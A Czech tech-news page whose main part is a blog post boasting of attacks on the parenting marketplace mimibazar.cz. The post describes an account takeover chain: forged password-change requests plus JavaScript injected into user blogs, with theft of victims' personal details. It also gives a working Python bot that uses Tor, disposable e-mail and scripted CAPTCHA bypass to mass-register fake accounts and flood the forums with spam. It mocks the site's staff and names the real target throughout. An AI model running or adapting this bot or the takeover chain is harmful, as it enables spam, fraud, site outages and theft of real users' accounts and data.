DuckDuckGo AI Chat umožňuje "pokecat si" s GPT-3.5 Turbo od OpenAI nebo Claude 1.2 Instant od Anthropic. Bez vytváření účtu. Všechny chaty jsou soukromé. DuckDuckGo je neukládá ani nepoužívá k trénování modelů umělé inteligence.
VASA-1, výzkumný projekt Microsoftu. Na vstupu stačí jediná fotka a zvukový záznam. Na výstupu je dokonalá mluvící nebo zpívající hlava. Prý si technologii nechá jenom pro sebe. Žádné demo, API nebo placená služba. Zatím.
Nová čísla časopisů od nakladatelství Raspberry Pi: MagPi 140 (pdf) a HackSpace 77 (pdf).
ESPHome, tj. open source systém umožňující nastavovat zařízení s čipy ESP (i dalšími) pomocí konfiguračních souborů a připojit je do domácí automatizace, například do Home Assistantu, byl vydán ve verzi 2024.4.0.
LF AI & Data Foundation patřící pod Linux Foundation spustila Open Platform for Enterprise AI (OPEA).
Neziskové průmyslové konsorcium Khronos Group vydalo verzi 1.1 specifikace OpenXR (Wikipedie), tj. standardu specifikujícího přístup k platformám a zařízením pro XR, tj. platformám a zařízením pro AR (rozšířenou realitu) a VR (virtuální realitu). Do základu se z rozšíření dostalo XR_EXT_local_floor. Společnost Collabora implementuje novou verzi specifikace do platformy Monado, tj. open source implementace OpenXR.
Byla vydána nová verze 0.38.0 multimediálního přehrávače mpv (Wikipedie) vycházejícího z přehrávačů MPlayer a mplayer2. Přehled novinek, změn a oprav na GitHubu. Požadován je FFmpeg 4.4 nebo novější a také libplacebo 6.338.2 nebo novější.
ClamAV (Wikipedie), tj. multiplatformní antivirový engine s otevřeným zdrojovým kódem pro detekci trojských koní, virů, malwaru a dalších škodlivých hrozeb, byl vydán ve verzích 1.3.1, 1.2.3 a 1.0.6. Ve verzi 1.3.1 je mimo jiné řešena bezpečnostní chyba CVE-2024-20380.
Digitální a informační agentura (DIA) oznámila (PDF, X a Facebook), že mobilní aplikace Portál občana je ode dneška oficiálně venku.
#HACKUJBRNO 2024, byly zveřejněny výsledky a výstupy hackathonu města Brna nad otevřenými městskými daty, který se konal 13. a 14. dubna 2024.
Si myslim že tohleto jako nikdo z vás nepochopí!! Najdu matronám z mimibazaru stovky chyb a nedostatků na webu, jim tam hledám chyby pišu ať si koukaj vopravit tohleto a támdlencto a voni mě zato akorát pořád banujou bez jedinýho děkuju, absolutně ignorujou co jim pišu a na maily vubec nereagujou. A taky na mě byly sprostý!! :O :D
Celý pythoní zdrojáčky ‚útoku‘ jsou dole pod textíkem. Skoro všecko ještě po čtrnácti dnech od hraní si s mimibazarem funguje, akorát guerrilla mail je potřeba nahradit nějakou jinou službou, aspoň dokavaď guerrilla nepřikoupí nějakou novou doménu a musí se +- tři dny čekat na ruční ověření založenýho účtu ;D
Neni to žádnej hack, jenom ten jejich web budeme používat jakoby trošičku alternativně. Žádný hesla prolamovat nebudeme i když si jako nedělám jako žádný iluze jak supr zabezpečený tam tohleto maj (způsob jak by jako šlo snadno převzít cizej účet dokonce bez lámání hesla je popsanej kousek dál). Budeme zase přistupovat jenom k tomu co samy chtěj mit veřejně dostupný nebo co mužeme vidět když se tam zaregistrujeme jako běžná uživatelka. Si myslim že největší tragikomedie je, že už jenom tohleto vám stačí na to abyste celej ten web mimibazaru mohli na X dní potopit až uplně na dno žumpy, hlavně když zohledníte jak to tam ty matrony jako šíleně vedou :D :D :O :O :'( :'(
Jo a i když si to teda matrony jako vubec nezasloužej za to jak se na lidi ošklivě chovaj, teda jako aspoň na mě, tak jsem respektovala že mi jakoby na dělání něčeho víc nedaly souhlas. Se asi domnívaj že se jich nějakej zlej opravdickej hacker bude ptát co jako muže dělat a co už teda jako ne :D :D :D :D
Registrační formulář najdete tady hele
Heslo se musí skládat jenom z malejch a velkejch alfanumerickejch ascii znaků, žádnej speciální znak vám to u nich nevezme :D Kromě minimální délky hesla 5 znaků je ve formuláři zadrátovaná maximální délka hesel na 20 znaků. Klidně bych se vsadila že nebudou ani ukládaný v hashích ale v obyč plaintextu protože by je pak administrátorky jako nemohly posílat zapomětlivejm mamkám na registrační emailový adresy. Si to teda jenom myslim protože když pak dokončíte registraci příde vám za chvilku generovaný mailík a na něm je takový zajímavý že obsahuje první a poslední písmenko zadanýho hesla. Ale to je jenom jakoby takový moje tušení ;D
Všiměte si taky jaký tam jdou dělat srandovní kombinace zeměpisnejch míst v adrese. V obrázku mužete vidět že nějakej ten náš Kořenov jakoby leží v Českým Krumlově kterej samotnej je v Číně :D :D
Poštovní směrovací číslo si mužete vyplnit snad uplně jaký chcete, s těma rozšoupávacíma nabídkama vubec nijak nesouvisí. Ulici s číslem popisným taky.
No a uplně vespod toho formuláře je prastará ochrana proti botům kterou tam kdysi pradávno dali dávný předkové současnejch vývojářů mimibazaru :D Jmenuje se to QapTcha. Zdrojáček tý starobylý qaptchy mužete najít na githubu, poslední aktualizace rok 2012 :O :O
Když se kouknete na php skriptík qaptchy hele, tak jsem si myslela že ji pude přečůrat obyč postem vlastního falešnýho klíče ale to z nějakýho tajemnýho důvodu nefungovalo!!!! :O :O
Nejspíš tam maj nějak upravenou verzi tý jejich captchy protože soubor ve zdrojáčku webovky se jmenuje trošičku jinak než ten na githubu. No tak jsem měla dvě možnosti. Buďto zachytávat celou komunikaci a přijít co se jako vodkuď do čeho a v jakým pořadí posílá a tak nebo fakt nějak s tim posouvátkem hejbat jak by to dělal jako uživatel. Rozhodla jsem se pro nejrychlejší způsob. Teda, nejrychlejší pro napsání skriptíku ne jako pro jeho běh ;D
No zkrátka jsem na to vzala selenium. Selenium je taková supr věc co vám umožňuje řídit internetovej prohlížeč. Nainstalujete si patřičnej jakože driver pro prohlížeč a pak skrze to selenium mužete řídit :O :O Selenium se prej používá hlavně na automatický testování webových aplikací ale tady taky odvedlo supr práci ;D
Pro automatickou registraci armádičky botů jsem použila supr stránku na vytváření dočasnejch emailovejch adres guerrilla mail. Maj dokonce zadarmo dostupný API hele a je k tomu i trošičku starší pythoní knihovna. Po mým přesvěčování matron škádlením spambotama na sněhový pusinky si tam s guerillamailem už boužel neškrtneme. Účty teďko po registraci nechávaj navíc tři dny zablokovaný a čeká se na ruční ověření adminem. Tohle je jako samo řešení akorát dobrý na to abych si třeba našla něco jinýho na hraní protože co není hnedka tak jako by pro mě neexistuje ale samozřejmě mužeme bejt mnóóóóóóhem přesvěčivější a použít opravdický identity opravdickejch lidí z ulice. Už by to stálo jako asi víc úsilí ale cílenej spam by šlo pořát propasírovat dovnitř. Třeba zase někdy příště ;D
Si představte taky že by tam ta adminka jako popelka musela třídit ~20 opravdickejch účtů mezi stovkama regnutejch botů, jako slušnej prostor pro lidskou chybu ;D
Mimibazar vám taky umožňuje si nechat ověřit fyzickou adresu že vám jako matrony asi pošlou domu obálku s nějakým kódem nebo jak to funguje a pak tam jako mužete prodávat a nakupovat. Bejt zlá, tak už matronám dávno došly obálky a dopisní papír :D :D ;D
Věrný čtenáři mýho blogísku si určitě už Grétobota všimli pod receptem na sněhový pusinky hele. Za inspiraci pro název bota děkuju Radovanoj, kdybych udělala třeba nějakou chybku a mamky by mě dostaly a nepodařilo by se mi to hodit na nějakýho toho sumce/amiga tak to všechno hodim na tebe jestli neva ;D
Z toho našeho registrovanýho účtu budeme spamovat primitivním robotem po fóru můj úžasnej receptík na sněhový pusinky. Grétobot má připravený dvě sady vět, jednu sadu pro založení novýho vlákna a druhou sadu jako reakce na příspěvek ve fóru. Inteligenci nemá skoro žádnou, věty si vybírá uplně náhodně a skoro vždycky se zakecá sám se sebou :D :D
Si možná řikáte že dělat ty sady vět bylo uplně zbytečný a že Grétobot toho jako moc neumí a je jako k ničemu a nikoho nemá šanci přesvěčit. A to teda zase nene!! Emoční vypětí umí zajímavě s lidma hejbat takže i uplně hloupoučkej Grétobot za určitejch správnejch podmínek jako dovede úspěšně zdolat Turingův test :O :O :O :O :D :D :D :D
Vidíte to samý co já?? Se nás neptaj na naše současný heslo a ani jinak to tam není zabezpečený :O :O :D :D ty položky heslo a heslo znova je nastavování novýho hesla ;D Takže by jako stačilo prohlížečem nějaký ty přihlášený mamky poslat jeden jedinej blbej post s vlastním novým heslem a účet je už náš :O :O
V tom nastavování účtu jste si možná všimli že tam jde snadno měnit taky svou emailovou adresu. Na tom samotným není asi nic špatnýho ale muže se to hodit v kombinaci s něčim dalším. Když posíláte novej soukromej vzkaz na tom jejich fóru, mužete zaškrtnout checkbox že chcete poslat kopii na svůj mail. Budeme jakoby psát na nějakej další mimibazarovej účet psaníčka s tim že si budeme posílat kopie na ‚svůj‘ mail kterej mezi psaníčka vždycky vyměníme za jinej. No tak jsem z mimibazaru napsala Ovčáčkoj na Pražskej hrad, Babišoj, Ivanoj Bartošoj, do nukibu, do Pentagonu… :O :D :D
Ty maily choděj z noreply@mimibazar.cz maj obrázek mimibazaru a je tam napsanej nick kterej je jako posílá. Až na vypínání odkazů je obsah +- identickej s obsahem psaníčka na fóru. Takže třeba chudák pan premiér si odkaz bude muset ručně nakopírovat z mailu do prohlížeče až jako bude chtít píct sněhový pusinky :O ;D To je samo jako spam skoro nahouby, jenže je to zase snadnej způsob jak by šlo dostat mimibazar na seznam spamovacích webů ;D
Tak a teď tady máme zlatej hřeb ;D
Na mimibazaru si taky mužete založit blogísek a psát si tam jaký zajímavý hračky doma zkoušíte kde všude nakupujete a takový jiný děsně důležitý věci. Jejich blogísky maj tragicky nízkej počet zobrazení, a tomu asi jako odpovídá míra podpory ze strany vývojářů. No prostě na mimibazaru nás to nechá nacpat do blogískovýho zápisku javascript, jediná ochrana je v jejich webovým textovým editoru. Stačí ho jako deaktivovat a mužete si tam psát uplně co vás jako napadne :O :O :D :D :D :D :D :D
Jasný, co není vidět to se nemusí jako nijak moc řešit nééééé???? :D :D
Takže tady máme smrtící mix jenom s využitím zdrojů co nám hodnej mimibazar sám poskytuje :D
Bejt my jako ty zlý, tak si třeba uděláme blogísek s něčim děsně zajímavým na odpoutání pozornosti a odkud jako budeme malililinkatým javaskriptíkem posílat ty naše posty na změnu hesel. Mohli bysme třeba přidat jako ještě jeden post kterej by nám z přebíranýho účtu posílal soukromou zprávičku na náš mimibazarovej profil s informacema jako o tom převzatým účtu, adresu, telefon, mail... :O :O
No a odkaz na náš blogísek by jsme hromadně rozesílali soukromejma zprávama nebo na maily co bysme vydolovali na fóru. Najdete jich tam jako hóóóóódně a to si jako myslim že je pramenem jejich současnýho problému s ruskýma spammerama. Hlavně že tam zakázaly napsat slovo 'abclinuxu.cz' ;D
Se stalo přesně to co jsem minule prorokovala v druhým odstavci sněhovejch pusinek hele :‘( samo že lopaty matrony natáhly a dodaly jim něco v hodnotě nedopalku cigarety zapíchnutýho do psího bobku na chodníku hnedka vedle popelnice a ještě celýho poblitýho od opilýho homelesáka :‘( :‘(
+- na tejden kuli tomu bez jakýhokoliv rozumnýho vysvětlení zmrazili databázi a stránky nechali jako read only, takže si mamky nejenomže mezi sebou nemohly posílat recepty na mňamozní bejlízy hele, ale taky mezi sebou nemohly kšeftovat jakoby v těch svejch e-schopech co jim ten mimibazar poskytuje. No a když si vezmete že tam některý ty mamky uměj udělat obrat i 600k měsíčně tak tejdení výpadek je v prasátku asi jako cejtit :O :O
Si ty hloupí adminky nejspíš neuvědomujou jaký maj vlastně úžasný štěstí že jsem se v tom rozhodla vrtat a nepřestala po jejich prvních sprostejch nadávkách. Si jako nedovedu vůbec přectavit že by moje mamka s někým takhle děsně sprostě mluvila jako co adminky mimibazaru psaly mě :O :O snad takhle adminky z mimibazaru neučej mluvit svoje děti protože to by už bylo pomaličku za hranou ohrožování mravní výchovy dítěte to co tam jako předváděj, si myslim :O :O
Takle na mě moje mamka nebyla sprostá ani když jsem kdysi dávno, asi předloni, takovým tim baseballovým míčkem na softball se kterým jsem doma měla zakázaný pinkat sestřelila z regálku takovýho porcelánovýho budhu a milej budha prosvištěl mamce pár cenťáků kolem hlavy a na parketách dosáhnul nirvány výbuchem na stovky uplně neslepitelnejch strašně řezavejch střepů který lítali uplně všude a pár se jich do těch parket taky zapíchlo že je skoro nebylo možný vyndat a táta na to musel vzit takovej ten vostrej šroubovák na rytí do dřeva :O :O Noa mě se rozšířil slovník sprostejch slovíček o hezkejch pár kousků :O :O :D :D Jenže ten propastnej rozdíl je vtom že moje mamka měla aspoň důvod se tak na mě chovat, matronám s mimibazaru jsem neudělala nic špatnýho a stejně jsou na mě sprostý a zlý :‘( :‘( jako já ale hlavně absolutně nechápu jako proč?!?!?!?! Se jim snažim pomoct a vony takhlen na mě :O :O Jsem nad tím přemejšlela a možná to je nějaká divná kombinace úchylný potřeby druhý nějak vychovávat současně s nějakejma komplexama co maj z těch ruskej spammerů co slovo 'rodinej' v názvu mimibazaru interpertujou krapátko jinak ;D si možná myslej že to co se tam děje nějak dělám já ale to je přece pitomost. Bych tam přece neházela recept na pusinky ne asi :'( :'(
Trošičku to celý s tim mimibazarem připomíná jakoby takový starání se o pokaděnýho starýho senilního důchodce co vubec netuší co se kolem něj děje a všeho se bojí a vy když ho chcete přebalit a umejt mu ten jeho pokaděnej zadek tak od něj zato schytáte jenom kotel sprostejch nadávek a možná pár ran vycházkovou holí přes holeňe :O :O :D :D Já to teda nedělám kuli těm hloupejm administrátorkám, těm i kdyby chcípaly na zemi ve strašnejch bolestech tak bych nepodala ani sklenici slaný vody za to jak na mě byly děsně sprostý a ošklivý. Jako takle, ze začátku to samo ode mě byla obyč škodolibost a taková jakoby zajímavá zábava dělat na tom mimibazaru bordýlek. Jenže pak mi začalo bejt těch uživatelek líto v jakým hnoji tam jako žijou aniž by jako byla nějaká vůle s tim něco udělat :‘( :‘(
Jako abych mamkám třeba nekřivdila, je taky možný že vývojáři nějak zkoušeli sabotovat mou komunikaci s adminkama protože co předvedli je jako šílenej šlenryján a hnusnej pokus někoho ošidit a jako poslední co potřebujou je aby se v tom vrtal někdo, kdo jako aspoň trošičku umí vycejtit že něco nehraje. No a teď si vemte jakou by měli vostudu kdyby jim zadky rozkopala malililililinkatatátá Grétulilililililililinka :O ;D :D :D :D
Bez odpovědi jsem z matron páčila kdo za tim vývojem webu jako stojí. Nóóóóóóóóóó chápu že se nechtěl podepsat :D ;D
No a tady je samotnej skriptík. Potřebujete mit nainstalovanej tor browser, gecko driver + to z minula hele.
A taky tyhlety další pythoní knihovničky
obyč selenium a taky tor-browser-selenium:
pip install selenium pip install tbselenium
knihovničku pro komunikaci s guerillamailem hele
pip install python-guerrillamail
knihovnu beautifulsoup4 na parsování html
pip install beautifulsoup4
A teďko ty samotný skripty. První je skript Grétobota
AbcLinuxu.cz
ITBiz.cz
HDmag.cz
AbcPráce.cz
#!/usr/bin/python3
# -*- coding: utf-8 -*-
from tbselenium.tbdriver import TorBrowserDriver
from selenium import webdriver
from selenium.webdriver.support import expected_conditions as EC
from selenium.common.exceptions import TimeoutException
from selenium.common.exceptions import JavascriptException
from selenium.webdriver.common.by import By
from selenium.webdriver.common.action_chains import ActionChains
from selenium.webdriver.support.ui import WebDriverWait
from selenium.webdriver.support.ui import Select
import time
#requesty použijeme na ověřování mailu
import requests
from fake_useragent import UserAgent
import random
import string
from guerrillamail import GuerrillaMailSession, GuerrillaMailClient
import json
from bs4 import BeautifulSoup
tor_proxy = {
'http': 'socks5://127.0.0.1:9050',
'https': 'socks5://127.0.0.1:9050'
}
UserAgent().update()
headers = { 'User-Agent': UserAgent().edge }
#budeme potřebovat upravit session guerrilla mailu
#ta by tam jako normálně lezla z naší normální ip takže tam musíme nacpat proxy toru
#uděláme to poděděním protože potomek jako přepiše metodu rodiče
class GuerrillaMailClient_proxy(GuerrillaMailClient):
def _do_request(self, session_id, **kwargs):
url = self.base_url + '/ajax.php'
#kwargs jsou parametry requestu
#musej tam bejt ip adresa 'ip' a funkci co jako chceme províst 'f' podle https://www.guerrillamail.com/GuerrillaMailAPI.html
#to 'f' si vyplňujou jiný metody co tuhletu volaj
kwargs['ip'] = "0.0.0.0"
if session_id is not None:
kwargs['sid_token'] = session_id
#sem se strčí argument proxies
response = requests.get(url,proxies=tor_proxy,params=kwargs)
#zbytek mužem asi nechat jako to už bylo
try:
response.raise_for_status()
except requests.HTTPError as e:
raise GuerrillaMailException(('Request failed: {e.request.url} ' +
'{e.response.status_code} {e.response.reason}').format(e=e))
data = json.loads(response.text)
return data
#funkce na dělání náhonej stringů třeba jejich supr bezpečnejch hesel hesel :D
def randString(num_chars=10):
letters = string.ascii_lowercase
return ''.join(random.choice(letters) for i in range(num_chars))
#seznam nejčastejších jmen podle wikipedie
#budeme z něj náhodně vybírat :D :D
prijmeni_list=["Nováková","Svobodová","Novotná","Dvořáková","Černá","Procházková","Kučerová","Veselá","Horáková","Němcová","Pokorná","Marková","Pospíšilová","Hájková","Jelínková","Králová","Růžičková","Benešová","Fialová","Sedláčková","Doležalová","Zemanová","Nguyen","Nguyen Thi","Nguyenová","Kolářová","Krejčová","Krejčí","Navrátilová","Čermáková","Urbanová","Vaňková","Blažková","Křížová","Kratochvílová","Kovářová","Kopecká","Bartošová","Vlčková","Musilová","Šimková","Poláková","Konečná","Malá","Čechová","Kadlecová","Štěpánková","Staňková","Holubová","Dostálová","Soukupová","Šťastná","Marešová","Sýkorová","Moravcová","Tichá","Valentová","Vávrová","Matoušková","Bláhová","Říhová","Ševčíková","Burešová","Hrušková","Mašková","Pavlíková","Dušková","Hrubá","Havlíčková","Jandová","Machová","Müllerová","Lišková"]
jmena_list=["Marie","Jana","Eva","Hana","Anna","Lenka","Kateřina","Věra","Lucie","Alena","Petra","Jaroslava","Veronika","Martina","Jitka","Tereza","Ludmila","Helena","Michaela","Zdeňka","Ivana","Jarmila","Monika","Zuzana","Jiřina","Markéta","Eliška","Marcela","Barbora","Dagmar","Dana","Kristýna","Vlasta","Božena","Irena","Miroslava","Libuše","Pavla","Marta","Adéla","Andrea"]
#uděláme funkci co nás registruje odklikne mail a všude vyvěsí náš supr recept ;D
#někdy muže selhat takže by bylo dobrý ji volat v cyklu dokavaď se třeba nepovede
def register():
#sezení guerrilla mailu pro komunikaci s jejich API
mail_session = GuerrillaMailSession()
mail_session.client=GuerrillaMailClient_proxy() #strčíme tam náš upravenej objekt
mail_str=mail_session.get_session_state()['email_address'] #a vezmem si string mailu
with TorBrowserDriver("/home/greta/.pppššššššššš/tor-browser_en-US/") as driver:
try:
driver.get('https://www.mimibazar.cz/reg.php')
except TimeoutException:
print("nějak dlouho to trvá než prohlížeč přeleze na stránku jako!!")
return False
delay = 10 # doba čekání na element v sekundách
#ui-accordion-regforms-header-0 je takový rozbalovací tlačítko na který se musí nejdřiv kliknout aby se mohlo registrovat
try:
myElem = WebDriverWait(driver, delay).until(EC.presence_of_element_located((By.ID, 'ui-accordion-regforms-header-0')))
except TimeoutException:
print("nějak dlouho to trvá čekat na ui-accordion-regforms-header-0 jako!!")
return False
# cc_banner je taková jakoby lištička s něčim o přijímání cookies
#někdy to muže vadit seleniu při klikání na věci takže ten cc_banner musíme jakoby schovat
try:
myElem = WebDriverWait(driver, delay).until(EC.presence_of_element_located((By.CLASS_NAME, 'cc_banner')))
except TimeoutException:
print("nějak dlouho to trvá čekat na cc_banner jako!!")
return False
#snížíme se k použití javaskriptíku na zmizení toho cc_banneru
js_string = "return document.getElementsByClassName('cc_banner')[0].remove();"
try:
driver.execute_script(js_string)
except JavascriptException:
print("nějak dlouho to trvá čekání na provedení js!!")
driver.quit()
return False
time.sleep(5) #správně by se mělo čekat třeba na oběvení nějakýho konrétního elementu v tom html ale takhle to stačí páč funguje ;D
driver.find_element_by_id("ui-accordion-regforms-header-0").click()
time.sleep(5)
#najdeme jako všechny ty vyplňovací inputy registračního formuláře
#ty jména najdete když si zobrazíte zdrojáček tý registrační stránky
#nebo když zachytíte post request v prohlížeči
login = driver.find_element_by_name("login")
password = driver.find_element_by_name("password")
password_2 = driver.find_element_by_name("password_2")
jmeno = driver.find_element_by_name("jmeno")
prijmeni = driver.find_element_by_name("prijmeni")
nick = driver.find_element_by_name("nick")
email = driver.find_element_by_name("email")
ulice = driver.find_element_by_name("ulice")
obec = driver.find_element_by_name("obec")
psc = driver.find_element_by_name("psc")
select_zeme = Select(driver.find_element_by_name("zeme"))
select_zeme.select_by_index(random.randint(1,100))
#uplně stejně vybereme oblast
#jsem se tady hóóóóódně naučila o zemáku :D třeba že švícarsko leží v afgánistánu :O :O
select_oblast = Select(driver.find_element_by_name("oblast"))
select_oblast.select_by_index(random.randint(1,100))
#odklikneme takový ty checkboxy jakože souhlasíme s podmínkama a zpracováním osobních údajů
podminky = driver.find_element_by_name("podminky")
podminky.click()
zpracovaniou = driver.find_element_by_name("zpracovaniou")
zpracovaniou.click()
#cituju: "Vaše heslo může obsahovat pouze čísla a písmena bez diakritiky" :D :D :D :D
passwd_str=randString(20)
nazev="Gretobot_"+randString(4)
print("login: "+nazev)
print("mail: "+mail_str)
print("password: "+passwd_str)
#a vyplníme samotnej formulář
login.send_keys(nazev)
password.send_keys(passwd_str)
password_2.send_keys(passwd_str)
#vybereme si náhodný jméno
jmeno.send_keys(random.choice(jmena_list))
prijmeni.send_keys(random.choice(prijmeni_list))
nick.send_keys(nazev)
#náhodná ulice a obec
#ale jakože uplně náhodnej řetězec :D :D :D :D
ulice.send_keys(randString(10))
obec.send_keys(randString(10))
#poštovní směrovací číslo je prej pět čísel a nikdy nezačíná osmičkou a víc :O
psc.send_keys(str(random.randint(10000,79999)))
#ješte mužeme nahradit zadní kus stringu mailu jinou doménou guerrilla mailu
#maj jich tam hodně a když třeba použijete '@sharklasers.com' tak to jako
#chvilku asi muže trvat než jim dojde co se jako děje :O :O
email.send_keys(mail_str.split("@")[0]+"@guerrillamail.com")
time.sleep(5)
#teď už máme vyplněnej formulář a mužeme se pustit do tý protibotí ochrany
#tady je jako ta tajemná starodávná posouvací lišta
#musíme na ni posunout takový posouvátko
source_element = driver.find_element_by_class_name('ui-draggable')
#nejdřiv k ní seskrolujeme protože musí bejt jakoby vidět
#protože dělat drag&drop jde jenom s tim co je vidět
source_element.location_once_scrolled_into_view
#posuneme posouvátko o 250 pixelů doprava že na něj jakoby klikneme myší držíme a jedem
ActionChains(driver).drag_and_drop_by_offset(source=source_element, xoffset=250, yoffset=0).perform()
#a teď ten vyplněnej formář mužeme poslat
time.sleep(5)
driver.find_element_by_class_name("submit").click()
driver.quit() #už tor browser nepotřebujem tak ho vypnem
#počkáme si až nám příde zprávička a jakoby klikneme na ověřovací odkaz v ní
#podpora@mimibazar.cz
#selenium jsme jako použili na obejití tý jejich starodávný javaskriptíkový ochrany před botama
#dál budeme zase používat knihovničku requests protože selenium je jako dost šneček v porovnání s nima :'(
#vypnem selenium
time.sleep(5)
#vyrobíme si objekt session kterej bude držet jakože naše sezení
#potřebujem když se chceme dostat za heslem chráněnej obsah abysme mohli do diskuzí poslat odkaz na náš báječnej recept
#všechny requesty budem posílat z toho objektu session
session = requests.session()
session.proxies=tor_proxy
session.headers=headers
#počkáme si až nám příde zprávička od podpora@mimibazar.cz a jakoby klikneme na ověřovací odkaz v ní
for i in range(15):
#vezmeme si seznam doručenejch zpráv a budeme hledat odesilatele 'podpora@mimibazar.cz'
inbox=mail_session.get_email_list()
for msg in inbox:
print("sender: "+msg.sender)
if "podpora@mimibazar.cz" == msg.sender:
#samotnej objekt mail v proměný msg má atribut body ale je prázdný :'(
#textík zprávy musíme vytáhnout ze session pomocí id mailu
id=msg.guid
mail_body=mail_session.get_email(id).body
#tělíčko toho majlu je jakoby takový html takže ho tak budeme parsovat pomocí knihovny BeautifulSoup
soup = BeautifulSoup(mail_body, "lxml")
#najdem první výskyt odkazu protože to je jako náš hledanej
#klíčkem 'href' získáme samotnej odkaz
link = soup.find("a")['href']
print("Ověřovací odkaz: "+link)
#jakoby to prokliknem že pošleme request get z objektu session
#nás to rovnou jakože i přihlásí tím prokliknutím na mimibazar ;D
req=session.get(link, proxies=tor_proxy,headers=headers)
print(req.status_code)
#a uložíme si pro jistotu registrovanej účet do texťáčku pro strejčka příhodu :D :D
with open("/home/greta/army.txt","a+") as army:
army.write("login: "+login_str+"\n")
army.write("password: "+passwd_str+"\n")
army.write("mail: "+mail_str+"\n")
army.write("\n")
army.close()
#sem původně jako chtěla vyplnit jenom formulář na https://www.mimibazar.cz/novy_recept.php a dát tam jako link sem na recept ve svým blogísku
#jenže je tam vtom formuláři červeným písmem jakože napsaný že se tam nesmí dávat jenom odkaz takže receptík budu muset děsně nenápadně šířit u nich v diskuzích :'(
#získáme seznam query kódů nedávno komentovanejch diskuzí
#query string je takovýto jakoby to za otazníčkama v url jako těba index.php?sfsj=123
codes=[] # sem si ty k=ody budeme schovávat
req=session.get("https://www.mimibazar.cz/posledni_prispevky.php", proxies=tor_proxy,headers=headers)
print(req.status_code)
#načteme si odpověď serveru v parseru BeautifulSoup a najdem v něm všechny odkazy <a href=""></a>
soup = BeautifulSoup(req.text, "lxml")
links=soup.find_all("a",href=True)
for link in links:
print(link)
url=link["href"]
if("diskuse.php?forum=" in url):
#rozpůlime řetězec v místě rovnítka a vezmeme si tu půlku za rovnítkem
code=url.split("=")[1]
codes.append(code)
#chceme jenom unikátní hodnoty
#toho dosáhnem převodem listu na sadu
codes=set(codes)
#a převedeme na tuple. tuple je to samý jako list ale jakoby konstatní takže ty elementy už nejde měnit
codes=tuple(codes)
print(codes)
#nějaký jakože textíky aby jsme byli děsně nenápadný
#ty slova v textu v těch kulatejch závorkách jsou některý smajlíky
texty=[]
texty.append("nejvíc nejlepší sněhový pusinky (koule) (koule)!!")
texty.append("musíte se jako něco dozvědět o sněhovejch pusinkách taky jako!!")
texty.append("si myslim že neumíte pořádně udělat sněhový pusinky žejo?? tak koukejte 
")
texty.append("tohleto jako musíte zkusit upíct !!")
texty.append("sněhoví pusinky maj tajemství. čtěte!!")
texty.append("že jste jako ještě nečetly o mejch sněhovejch pusinkách??")
texty.append("už ste viděly muj děsně tajnej recept na sněhový pusinky??")
texty.append("co je jako nejvíc nejlepší?? Grétiny sněhoví pusinky!!!!")
texty.append("(novy rok) do novýho roku vám přeju mír lásku a spustu sněhovejch pusinek ,-) ,-) !!!!")
texty.append("si myslim že jste nervózní protože vám chybí curk. tak hele")
texty.append("MŇAMOZNÍ recept jako na sněhoví pusinky (L) (L)")
texty.append("ukážu vám nejvíc nejlepší (stromecek) (stromecek) vánoční (stromecek) (stromecek) cukroví")
texty.append("tohleto musíte jako prostě vidět!!")
texty.append("grétiny sněhový (k) (k) (k) (k)")
texty.append("sněhoví pusinky!! sněhoví pusinky!! sněhoví pusinky!! sněhoví pusinky!! sněhoví pusinky!! sněhoví pusinky!! sněhoví pusinky!! sněhoví pusinky!! sněhoví pusinky!! sněhoví pusinky!! sněhoví pusinky!! sněhoví pusinky!! sněhoví pusinky!! sněhoví pusinky!! sněhoví pusinky!! sněhoví pusinky!! sněhoví pusinky!! sněhoví pusinky!! sněhoví pusinky!! sněhoví pusinky!! sněhoví pusinky!! sněhoví pusinky!! sněhoví pusinky!! sněhoví pusinky!! sněhoví pusinky!! sněhoví pusinky!! sněhoví pusinky!! sněhoví pusinky!! sněhoví pusinky!! sněhoví pusinky!! sněhoví pusinky!! sněhoví pusinky!! hele")
pusinky_url=" https://www.abclinuxu.cz/blog/GretinBlogisek/2020/1/gretiny-snehovy-pusinky"
# třeba desetkrát hodíme novej koment do nedávno diskutovanejch diskuzí
for i in range(10):
post_data={
"insert": "ok",
"text": random.choice(texty)+pusinky_url
}
url="https://www.mimibazar.cz/novy_diskusni_prispevek.php"
#hodíme náhodně do nějaký z poslednějších diskuzí vyplněním query kódu
post_params={
"forum": random.choice(codes)
}
req=session.post(url,data=post_data,params=post_params)
print(req.text)
print(req.status_code)
print(url)
#teď budeme reagovat na náhodnej komentář v diskuzi
reakce=[]
reakce.append("tohleto mi děsně připomíná mý sněhoví pusinky!!")
reakce.append("hmmmmmm. a co si myslíš o mejch sněhovejch pusinkách??")
reakce.append("moje sněhoví pusinky by byly proti jako!!")
reakce.append("krásný!! ale tak krásný jako mý sněhoví pusinky to teda neni!!")
reakce.append("a co bys řekla na mý sněhoví pusinky?? ")
reakce.append("extra tobě prozradim něco o sněhovejch pusinkách!! ale pššššššššš!!!!")
reakce.append("chceš si přečíst jako něco tajnýho o sněhovejch pusinkách??")
reakce.append("nejrači bych ti zavřela pusu. svou sněhovou pusinkou!!!! (koule) (koule) (koule) (koule)")
reakce.append("z toho co pišeš mi je jasný že nevíš jak se dělaj sněhoví pusinky. tak hele")
reakce.append("pššššššššššššššš!! uplně supr recept na sněhoví pusinky")
reakce.append("moc hezky si to napsala. tak hezký jsou na světě už jenom akorát mý sněhoví pusinky!!")
reakce.append("normálně si mě urazila tim co pišeš!! se s tebou usmířim jen když upečeš mý sněhoví pusinky jako!!!! (koule) (koule) (koule) (koule)")
reakce.append("máš takovej smutnej obličej. nedáš si sněhovou pusinku??")
reakce.append("si myslim že umíš uplně supr vařit. co si jako myslíš o mejch sněhovejch pusinkách????")
reakce.append("chceš sněhovou pusinku žejo?? ")
reakce.append("hádej hádej hadači jak se jako dělaj sněhoví pusinky")
reakce.append("nebudeš se jako zlobit když ti sem hodim svůj receptík na sněhoví pusinky??")
reakce.append("chceš nebo nechceš tady máš receptík na sněhoví pusinky!!!!!! tak!!!!")
reakce.append("hele!!!!")
reakce.append("tebe už sem dlouho neviděla (hello) (hello). nedáš si sněhovou pusinku jako????")
for i in range(50):
#nejdřiv si načteme náhodnou poslední diskuzi
url="https://www.mimibazar.cz/diskuse.php?forum="+str(random.choice(codes))
req=session.get("https://www.mimibazar.cz/posledni_prispevky.php", proxies=tor_proxy,headers=headers)
print(req.status_code)
#najdem si jednotlivý komentáře
#jsou v tom html jako tabulky s css třídou 't2'
comments=soup.find_all("table",{"class": "t2"})
#vybereme náhodnej koment
print("koment: ")
comment=random.choice(comments)
print(comment)
